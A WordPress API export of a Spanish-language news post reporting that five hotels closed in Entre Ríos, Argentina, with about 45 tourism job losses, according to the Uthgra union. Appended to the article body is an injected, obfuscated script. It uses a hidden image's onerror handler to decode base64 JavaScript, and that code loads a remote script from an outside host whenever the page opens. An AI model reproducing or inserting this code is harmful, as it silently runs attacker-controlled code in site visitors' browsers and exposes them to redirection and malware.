{"id":9808,"date":"2025-07-24T21:23:27","date_gmt":"2025-07-25T00:23:27","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9808"},"modified":"2025-08-13T15:25:30","modified_gmt":"2025-08-13T18:25:30","slug":"entre-rios-la-provincia-del-termalismo-cerraron-cinco-hoteles-y-ya-hay-casi-50-despidos-en-el-sector-turistico","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9808","title":{"rendered":"Entre R\u00edos: la provincia del termalismo! Cerraron cinco hoteles y ya hay casi 50 despidos en el sector tur\u00edstico"},"content":{"rendered":"\n<p><em>La profunda\u00a0<strong>crisis econ\u00f3mica que atraviesa el pa\u00eds sigue dejando consecuencias visibles en Entre R\u00edos.<\/strong>\u00a0En los \u00faltimos meses, cinco hoteles de la provincia cerraron sus puertas y se registraron\u00a0<strong>al menos 45 despidos en el rubro tur\u00edstico y gastron\u00f3mico. As\u00ed lo revel\u00f3 un informe de la Seccional Paran\u00e1 de la Uni\u00f3n de Trabajadores del Turismo, Hoteleros y Gastron\u00f3micos de la Rep\u00fablica Argentina (Uthgra).<\/strong><\/em><\/p>\n\n\n\n<p>El relevamiento indica que<strong>\u00a0dos hoteles cerraron en Paran\u00e1, otros dos en La Paz y uno m\u00e1s en Victoria.<\/strong>\u00a0A estos se podr\u00eda sumar un sexto establecimiento \u2013tambi\u00e9n en Victoria\u2013 que eval\u00faa cesar su actividad de forma definitiva en los pr\u00f3ximos d\u00edas.<\/p>\n\n\n\n<p>Seg\u00fan el informe de Uthgra,\u00a0<strong>entre los hoteles que dejaron de funcionar se encuentran Posta del Sol en Paran\u00e1 y El Molino en Victoria. Tambi\u00e9n cerraron Costa Dorada, ubicado dentro del complejo termal de La Paz, y Hotel Rivera, sobre calle San Mart\u00edn<\/strong>. Adem\u00e1s, se confirm\u00f3 el cierre del tradicional\u00a0<strong>Hotel Provincial<\/strong>\u00a0en la capital entrerriana, uno de los m\u00e1s emblem\u00e1ticos de la ciudad.<\/p>\n\n\n\n<p>Desde el gremio se\u00f1alaron que<strong>\u00a0\u201cla prolongada crisis econ\u00f3mica incide directamente en la operatividad y viabilidad financiera de los hoteles\u201d<\/strong>. A esta situaci\u00f3n se suma un factor que preocupa cada vez m\u00e1s: la creciente oferta de\u00a0<strong>alojamientos informales<\/strong>, como departamentos, caba\u00f1as y casas particulares que, sin habilitaci\u00f3n ni controles, alteran el perfil del turismo tradicional y generan una competencia desigual.<\/p>\n\n\n\n<p><strong>\u201cEl cambio en las preferencias de los viajeros y la falta de regulaciones efectivas para los alojamientos informales<\/strong>&nbsp;hacen cada vez m\u00e1s dif\u00edcil sostener la actividad hotelera formal\u201d, remarcaron desde Uthgra.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Impacto en el empleo y en las econom\u00edas locales<\/h2>\n\n\n\n<p>La ola de cierres&nbsp;<strong>no solo representa una p\u00e9rdida directa de fuentes de trabajo formal, sino que tambi\u00e9n repercute en las econom\u00edas regionales,&nbsp;<\/strong>fuertemente ligadas al movimiento tur\u00edstico. Las ciudades afectadas ven disminuir sus ingresos por servicios, gastronom\u00eda y comercio, al tiempo que se profundiza la informalidad y se debilita el tejido social.<\/p>\n\n\n\n<p><strong>\u201cEl cierre de establecimientos hoteleros es un reflejo claro de la crisis econ\u00f3mica actual&nbsp;<\/strong>y de las transformaciones en el sector tur\u00edstico. Para revertir esta situaci\u00f3n, es imprescindible un trabajo articulado entre gremios, empresarios y organismos del Estado, que permita generar soluciones innovadoras y garantizar la estabilidad laboral y econ\u00f3mica del sector\u201d, concluyeron desde el gremio.<\/p>\n\n\n\n<p>Durante las vacaciones de invierno de 2025,\u00a0<strong>la actividad tur\u00edstica en Entre R\u00edos registr\u00f3 una ca\u00edda considerable respecto al a\u00f1o anterior<\/strong>, consolidando una tendencia negativa que genera preocupaci\u00f3n en el sector.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/Captura-de-pantalla_24-7-2025_211158_www.msn_.com_.jpeg\"><img decoding=\"async\" width=\"120\" height=\"44\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/Captura-de-pantalla_24-7-2025_211158_www.msn_.com_.jpeg\" alt=\"\" class=\"wp-image-9809\" style=\"width:150px;height:auto\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La profunda\u00a0crisis econ\u00f3mica que atraviesa el pa\u00eds sigue dejando consecuencias visibles en Entre R\u00edos.\u00a0En los \u00faltimos meses, cinco hoteles de la provincia cerraron sus puertas y se registraron\u00a0al menos 45 despidos en el rubro tur\u00edstico y gastron\u00f3mico. As\u00ed lo revel\u00f3 un informe de la Seccional Paran\u00e1 de la Uni\u00f3n de Trabajadores del Turismo, Hoteleros y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9810,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,28],"tags":[],"class_list":["post-9808","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9808","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9808"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9808\/revisions"}],"predecessor-version":[{"id":9882,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9808\/revisions\/9882"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9810"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9808"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9808"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9808"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}